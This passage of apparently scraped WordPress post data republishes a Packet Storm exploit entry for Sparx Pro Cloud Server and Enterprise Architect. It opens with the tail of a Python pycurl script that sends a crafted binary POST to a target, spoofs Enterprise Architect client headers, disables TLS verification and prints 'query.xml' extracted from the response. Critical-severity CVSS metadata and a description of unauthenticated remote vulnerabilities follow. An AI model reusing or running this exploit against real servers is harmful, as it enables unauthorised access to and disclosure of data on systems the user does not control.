binary+=bytes([ord(c),0])\\n \\n c=pycurl.Curl()\\n c.setopt(pycurl.URL, url)\\n c.setopt(pycurl.READDATA, BytesIO(binary))\\n c.setopt(pycurl.POSTFIELDSIZE, len(binary))\\n c.setopt(pycurl.POST, 1)\\n c.setopt(pycurl.VERBOSE, 1)\\n c.setopt(pycurl.DEBUGFUNCTION, test)\\n c.setopt(pycurl.HTTPHEADER, [‘Content-Type: ‘ , ‘Accept: ‘, ‘EnterpriseArchitect-Build: 1527’ , ‘EnterpriseArchitect-InternalBuild: 481’ , ‘User-Agent: Enterprise Architect\/15.1.1527’ , ‘Connection: Keep-Alive’ , ‘Cache-Control: no-cache’])\\n body = BytesIO()\\n c.setopt(pycurl.WRITEDATA, body)\\n c.setopt(pycurl.SSL_VERIFYPEER, 0)\\n c.setopt(pycurl.SSL_VERIFYHOST, 0)\\n c.perform()\\n c.close()\\n \\n try:\\n z = zipfile.ZipFile(body)\\n print(z.read(‘query.xml’).decode(‘utf-8’))\\n except zipfile.BadZipFile:\\n sys.stdout.buffer.write(body.getvalue())”,”sourceHref”:”https:\/\/packetstorm.news\/download\/221993″,”cvss”:{“score”:9.3,”severity”:”CRITICAL”,”vector”:”CVSS:4.0\/AV:N\/AC:L\/AT:N\/PR:N\/UI:N\/VC:H\/SC:N\/VI:H\/SI:N\/VA:L\/SA:N”,”version”:”4.0″},”cvss2″:{},”cvss3″:{“version”:””,”vectorString”:””,”baseScore”:0,”baseSeverity”:””,”attackVector”:””,”attackComplexity”:””,”privilegesRequired”:””,”userInteraction”:””,”scope”:””,”confidentialityImpact”:””,”integrityImpact”:””,”availabilityImpact”:””,”cvssV3″:{“version”:””,”vectorString”:””,”baseScore”:0,”baseSeverity”:””,”attackVector”:””,”attackComplexity”:””,”privilegesRequired”:””,”userInteraction”:””,”scope”:””,”confidentialityImpact”:””,”integrityImpact”:””,”availabilityImpact”:””}},”href”:”https:\/\/packetstorm.news\/files\/id\/221993\/”,”category_name”:”Exploit”,”post_link”:””,”product”:””,”version”:””,”vendor”:””,”ai_description”:””,”ai_severity”:””,”ai_vendor”:””,”ai_product”:””,”ai_version”:””,”ai_score”:0}<\/p>\n","protected":false},"excerpt":{"rendered":"
{“lastseen”:”2026-05-26T16:00:43″,”description”:”Multiple vulnerabilities in Sparx Pro Cloud Server PCS versions 6.1 and below and Sparx Enterprise Architect versions 17.1 and below allow a remote unauthenticated attacker…<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[3],"tags":[9,6,8,55,12,13,53,7,11,5],"class_list":["post-56965","post","type-post","status-publish","format-standard","hentry","category-category_exploit","tag-critical","tag-cve","tag-cvss","tag-cvss-93","tag-exploit","tag-news","tag-packetstorm","tag-security","tag-tapic","tag-vulnerability"],"yoast_head":"\n